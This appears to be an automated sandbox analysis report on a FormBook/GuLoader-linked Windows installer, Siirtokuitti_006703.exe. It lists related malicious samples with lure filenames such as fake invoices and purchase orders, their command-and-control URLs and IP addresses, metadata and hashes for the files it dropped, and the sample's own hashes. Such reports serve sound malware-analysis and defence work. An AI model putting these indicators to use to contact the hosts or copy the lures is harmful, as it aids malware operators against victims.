                                                                              • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, prdv4a.aadg.msidentity.com, login.live.com, tile-service.weather.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, wdcp.microsoft.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                              • Execution Graph export aborted for target Siirtokuitti_006703.exe, PID 8416 because there are no executed function
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              No simulations
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              130.185.109.77P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
                                                                              535276_86376.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
                                                                              Product_List.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==
                                                                              PS_231.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?kyx=IT_WJ&HqE8Cy=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
                                                                              KD_MEDICAL_POLSKA_23053371.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.die-cyber-versicherer.com/co9t/?LVuSGU=-giyq0&MGuik=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==
                                                                              s4YvlK74zJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.die-cyber-versicherer.com/co9t/?h1=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==&m8hK_F=yFTUihtd4y
                                                                              24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?Bjk=Fjw7NbIMlZ8ijMXD&67FoqNQb=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==
                                                                              Project6531678ZXGT7E.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?lN=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k4SHQdXkalH8+fUZT81zR875Z&g6tdKQ=x7tw
                                                                              Product_2798679039798.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?uv07ZY=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&oQpHyl=qT7yWNInu
                                                                              32426387455_W5373883.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?GZN=6mGs&pf3=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k4V3BQC4bliA6eEZT81nMxb5Z
                                                                              DHL_INVOICE_NOTIFICATION_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/n65e/?L6G9CC=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9xbPTfBYDSAjd9Vw==&OjglYF=nrT9ttFevz9kJV
                                                                              INVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/bpg5/?JaU=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k4SHQdXkalH8+fUZT81zR875Z&G3=nb4FI3S6Ge8yTg
                                                                              PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/n65e/?vsc5CQEL=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9ycOP5O5TaCRJITfdEpyVN7IM+&BOlc_j=zr9WAC
                                                                              PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/n65e/?JBlCXoB=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9yRp3PEq7aGAhEUg==&ik_E=eSJ0Nu0lvfR1d
                                                                              rORDERINQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.berlinhealthweek.com/n65e/?2zA4Ozc2=6yO9fYe2l72ucsH66gyZY6BVRsQbQ6t2bL7S9rbBk/tOcgXaRN4vcF5ewa8mY8al2Njms7MhjcL3QNfNzH9ycOP5O5TaCRJITfdEpyVN7IM+&vaaH=mXhCUEu
                                                                              SCAN_039478575-PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • www.haschischfabrik.com/q9dv/?Jbh8aP=FBQmPzGUu2i12HY687gK1tL9tCd8zZBd53AIwE1qzSPr9ozt5Jdog2dHWNPdIOyDotYFuSyhriuPbrH5p8hvlRNA52TgK1SmYA==&m8sX4N=6lrLYL38Pp3TVn4p
                                                                              hornMX9rFW.exeGet hashmaliciousFormBookBrowse
                                                                              • www.heyabo.com/hisp/?YR=lRVzyHAqIBmA5ZYI/BSeAnUngkbG+4zlr4M5FXEoiiIvCzMiK86iL+tPeqjgOQFDC3P8&utUPMn=mT-DZ
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.zinkiggekis.xyzNurseries.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 109.123.121.243
                                                                              Udbytninger.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 109.123.121.243
                                                                              Beboer.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 109.123.121.243
                                                                              Andetledets.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 109.123.121.243
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              XIRRADEP5348574_74676.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              Product7825.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              535276_86376.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              Product_List.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              PS_231.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              KD_MEDICAL_POLSKA_23053371.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 130.185.109.77
                                                                              s4YvlK74zJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 130.185.109.77
                                                                              24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              Project6531678ZXGT7E.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              Product_2798679039798.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              32426387455_W5373883.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              DHL_INVOICE_NOTIFICATION_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              INVOICE_#2736.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              KXDmIlMnn3.elfGet hashmaliciousMiraiBrowse
                                                                              • 185.169.25.1
                                                                              PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              rORDERINQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              SCAN_039478575-PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 130.185.109.77
                                                                              SqBed9dcfzGet hashmaliciousMiraiBrowse
                                                                              • 195.138.242.140
                                                                              hornMX9rFW.exeGet hashmaliciousFormBookBrowse
                                                                              • 130.185.109.77
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              37f463bf4616ecd445d4a1937da06e195818invcomp5818.jsGet hashmaliciousNetSupport RATBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              Testifying14_OGTB.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              Musikus.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              #Uad6c#Ub9e4#Ud655#Uc778#Uc11c.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              Quotation_Invoice_-_new_Order.exeGet hashmaliciousAveMaria, Clipboard Hijacker, UACMeBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              TRT432537.2023.624430.673564.26748.lNk.lnkGet hashmaliciousUnknownBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnkGet hashmaliciousUnknownBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              08590699.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              rFactura.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              z1INV-01182023.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              SiiMarzo.msiGet hashmaliciousUnknownBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              Update.jsGet hashmaliciousUnknownBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              18042023_Sotramac - Modelo Financiero_Propuesta Lenders_Consolidado.xlsmGet hashmaliciousUnknownBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              Ramsay.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              Restindholdenes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 172.217.18.110
                                                                              • 142.250.186.97
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dllAY_Cerrahi_Aletler_A.#U015e%0%_Order_n#U00b0_23005254.exeGet hashmaliciousGuLoaderBrowse
                                                                                Testifying14_OGTB.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                  Musikus.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    Testifying14_OGTB.exeGet hashmaliciousGuLoaderBrowse
                                                                                      Musikus.exeGet hashmaliciousGuLoaderBrowse
                                                                                        rFactura.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                          z1INV-01182023.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            rFactura.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                              z1INV-01182023.exeGet hashmaliciousGuLoaderBrowse
                                                                                                Ramsay.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                  Ramsay.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    Kulbrintens.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                      Factura.rarGet hashmaliciousGuLoaderBrowse
                                                                                                        Kulbrintens.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          EXTRACTO_BANCARIO.PDF.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                            EXTRACTO_BANCARIO.PDF.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              L1uUC7RRH4.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                L1uUC7RRH4.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  RFQ_96673761.05..2023.exeGet hashmaliciousRemcosBrowse
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):413494
                                                                                                                    Entropy (8bit):6.407604815002332
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:5ZGKPIh5IfAwA5ds8EJH942qE4dTII+crUvAmpEl:GeIhcPkspePdTIeaAmpa
                                                                                                                    MD5:5D12986BB321817EB443F07AD849BE30
                                                                                                                    SHA1:FB77CAD1471649E61C5661884C7283F45FF75DA1
                                                                                                                    SHA-256:B74105E535D8D7EED3788E9E0AC5A1FEBEE72CC2CE05C3EEA2EE67E43FC394B4
                                                                                                                    SHA-512:11328E699AC4FC79E54CE666E01BFDD75B70C6E5614563E3AD7F781557920C165BA971156972AC79E141EC0D4297E513A6A249102FAFA926C42EF8D69DB652BB
                                                                                                                    Malicious:false
                                                                                                                    Preview:........x..Z.<.Y...........B....GGG...<..4.....,......r.......u..........................""".{..........................A..............""......YYY...............VV........./......................o........BB....&&.........................................t.<......................................................YYY...........?...p.>.........&&.....................S....##.............*.....................h.....................~~..........K...]]]....BB.....8............\\\\.........K.III..............D...............................................................2.....h......NN..........6666.....\.....................6....0..................7777.......YYY.F.......6..q.........g............................FFFFFF........4.......................................................AA..........-............BBBBBB.................CC..,,,,........................4........GGG..LL.......00.....................K............0..~~.................... ..``..........***.....i.-.........((.....9._.t.......
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1245
                                                                                                                    Entropy (8bit):5.462849750105637
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                                                                    MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                                                                    SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                                                                    SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                                                                    SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                                                                    Malicious:false
                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16219
                                                                                                                    Entropy (8bit):4.008729331792855
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:ir9n+rMUfsqjeWnShfO1LpBIB9jip10zsPRO2a8fUhe1RBC6sl4wjn/PqIpqINAG:09n+4csqjeWnSh21LpBIB1O10zsPRO2e
                                                                                                                    MD5:8EE06A03DC18E5F8BC750CB6A78F6D9C
                                                                                                                    SHA1:179C195700DF844216C2CABDC17062CDDBD1D6B3
                                                                                                                    SHA-256:01E7B965BD4B722003F74B4E4B30EF6A1BAEA67108816D1B9F8D6ADD39C7FA10
                                                                                                                    SHA-512:4C908BA391BAC8BD36BF76B5C3B59DD59EB71F2513BCD04C47CBDE683AD463C0FEAC5D5AADA67730F3F566156C4BEFF09CD7B7D1EB043B988AD7938B9041C4EC
                                                                                                                    Malicious:false
                                                                                                                    Preview:.;!@Lang2@!UTF-8!..; 4.09 : Chayanon Ruamcharoen..; 4.10 : Zafire06 ..; 9.13 : Kom10..;..;..;..;..;..;..;..;..0..7-Zip..Thai.......401......................&.....&.....&..................&..............440........................................&...................&...................&.....................................................500..&......&.......&........&............&............&...........540..&..............................................&........&.......&.......
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):169022
                                                                                                                    Entropy (8bit):4.589886661555487
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:EuF+zTMtOKaWpnCXRGvmAxfv/oFqaJ+/BwcvxzUbRPadQsTV2rEMpkFwWdjp:PF+zoO2ChoxfHhaJSxcpctV4E6ub
                                                                                                                    MD5:C6D8804F1AEF373987D4379775120355
                                                                                                                    SHA1:839D3072BA5BF68A866488F6DB0CCBE7F99EE926
                                                                                                                    SHA-256:1DF9113DBE9C4E3D9CDE48E847E02E9293A19EE9C7907513EC194F6060D56327
                                                                                                                    SHA-512:4DE963ADCDFA244180F125E8D3656B401AB532E6CCFFA4273F09727B3E6B2D8B8FF91CFBAB96D5C1812BC68CD1F20508645CAEE5CFC18478BFC298B3E5749C95
                                                                                                                    Malicious:false
                                                                                                                    Preview:..........YY......h..........||.....................................E....-....*.rr......................44......z..."...\\....E........................5............///...,.........ee......"".............|.............o....eeeee...T.....(.|.....}....m....._..........!!!!................____..............QQ......[..............?.-.........C..................6.IIII.....f.........$.`......f..........."....................................NNN......................r....mm.............................................?.Z................22....................3...........7777......####.55...l.......0..............L........N.HHHH.D..................\\\\\.......S.................vvv..............+...........................\\\\\\..........................QQ......................jj..................q.]]......................................................................................i.t.2.........JJJ.............c........==....;...................F....Q..P......**.....f.................444...eee
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):113
                                                                                                                    Entropy (8bit):5.322830648467957
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:yionv//thPl9vt3lAnsrtxBllRxdh9TFaxedVjtNOh99bXDgpaGp:6v/lhPysfnTF6QROripxp
                                                                                                                    MD5:2D78FF1482A10EA250A500C55EDB7A4D
                                                                                                                    SHA1:02DC306A0B14673185941637E78C3E0115F3BADC
                                                                                                                    SHA-256:EA88C0E8743471267DB4183A75E6122CE10062EF396ABEAE5C0BC4FD2D65A6F1
                                                                                                                    SHA-512:2EB3D54E72CFF8B061676AA791D021464777FEA77E5D6424B8DE9A78C8E32D894ED164C096FC150C7B0E4D46A8B31C75B54A72C2DB02DECAECB8E555D39993A0
                                                                                                                    Malicious:false
                                                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d....(IDAT8.c`...?...L..0..0......>.]@...X........S.w....IEND.B`.
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):335
                                                                                                                    Entropy (8bit):7.095851697806942
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:6v/lhPys5Jof+tyN7VOpx4afN+5NgEH6qLcI+u0esU4rEZldp:6v/7ZykpiU0PzcI+u0esUsu
                                                                                                                    MD5:E72143CD9BE062D8342120781800F8BC
                                                                                                                    SHA1:5D85AA22D020B3D61E006514F656604F5B1408D0
                                                                                                                    SHA-256:68ED609E76734EA801E8D6A339FB49B8DD6A783AE200380C4E35ABDD47E77094
                                                                                                                    SHA-512:D34C6CEDA5DFCDC222A7BFC0FDB1B6532287DD2A89BE6A098986C727D37285D27BEE9DC5D9C681CA7FE4CDB3A1246068A2AC1A6D0AD36E939F7A3FA44401DA5F
                                                                                                                    Malicious:false
                                                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...JCA....A.......4..+;.!....Fm..`..+.AHo.MbRd.,..........3.g./............q..4@.C....=.4Q..e...G..E..!....r..V.@.E...W3.K.o.....Z.0:a...ceX...\......zI..[.......j-.u|.....$y=l...$....b.v.......2H..S.....8J.G...1y:]l..*8....j#..f.f.l|g......@>eI.2......IEND.B`.
                                                                                                                    Process:C:\Windows\SysWOW64\mstsc.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):122880
                                                                                                                    Entropy (8bit):1.1305327154874678
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                                                                    MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                                                                    SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                                                                    SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                                                                    SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):628366
                                                                                                                    Entropy (8bit):5.986084149074343
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:YA0HeIhcPkspePdTIeaAmpx2Ikf356uqb:HtDMPdIeOxZky
                                                                                                                    MD5:86135A8B6112F3F13C0FE924F05AD36A
                                                                                                                    SHA1:33F38034799879E755AD0DE41BE614AB8ABB1366
                                                                                                                    SHA-256:82DB411D8166E41F07E5056580A9791F7DBF33149B4B707DC2DC18C5C690F03F
                                                                                                                    SHA-512:8774ACCA21FB5275D4AE1BD08387F67A44B23DE0169F4783DB396402A388397FE73D2F9AB0E2D21B9EE28634151715C8E991680B1CE365A8723217FC54A7576F
                                                                                                                    Malicious:false
                                                                                                                    Preview:.>......,.......,.......D.......`........=.......>..........................................................................................................................................................................................................................................G...J...........!...h...............................................................g...............................................................j...............................................................................................................................8...........q...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):11776
                                                                                                                    Entropy (8bit):5.659384359264642
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                                                    MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                                                    SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                                                    SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                                                    SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: AY_Cerrahi_Aletler_A.#U015e%0%_Order_n#U00b0_23005254.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Testifying14_OGTB.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Musikus.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Testifying14_OGTB.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Musikus.exe, Detection: malicious, Browse
                                                                                                                    • Filename: rFactura.bat.exe, Detection: malicious, Browse
                                                                                                                    • Filename: z1INV-01182023.exe, Detection: malicious, Browse
                                                                                                                    • Filename: rFactura.bat.exe, Detection: malicious, Browse
                                                                                                                    • Filename: z1INV-01182023.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Ramsay.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Ramsay.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Kulbrintens.bat.exe, Detection: malicious, Browse
                                                                                                                    • Filename: Factura.rar, Detection: malicious, Browse
                                                                                                                    • Filename: Kulbrintens.bat.exe, Detection: malicious, Browse
                                                                                                                    • Filename: EXTRACTO_BANCARIO.PDF.bat.exe, Detection: malicious, Browse
                                                                                                                    • Filename: EXTRACTO_BANCARIO.PDF.bat.exe, Detection: malicious, Browse
                                                                                                                    • Filename: L1uUC7RRH4.exe, Detection: malicious, Browse
                                                                                                                    • Filename: L1uUC7RRH4.exe, Detection: malicious, Browse
                                                                                                                    • Filename: RFQ_96673761.05..2023.exe, Detection: malicious, Browse
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                    Entropy (8bit):7.397413296440861
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:Siirtokuitti_006703.exe
                                                                                                                    File size:638699
                                                                                                                    MD5:917202e098f68d9b97db1a1f685e8d39
                                                                                                                    SHA1:adebee937368f6669bce198f93d15c81d8a8bbaf
                                                                                                                    SHA256:be84718f9896671037fcf972d60ebf25d4a13f9bd8243d56c23ec6d4a89fb580
                                                                                                                    SHA512:554aa6b47ef058d55474163d56a9376e9ab854ffead548a49e81d645c5b341d1cad0d2dd629230d0bb9b7a5ab50a7d06139970e58b59a8175e1d24f1778460ce
                                                                                                                    SSDEEP:12288:Uoqqqqqqqqqqqqqqqqqqqqq0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqV:U12btwSYq4RcRDKSPtePx
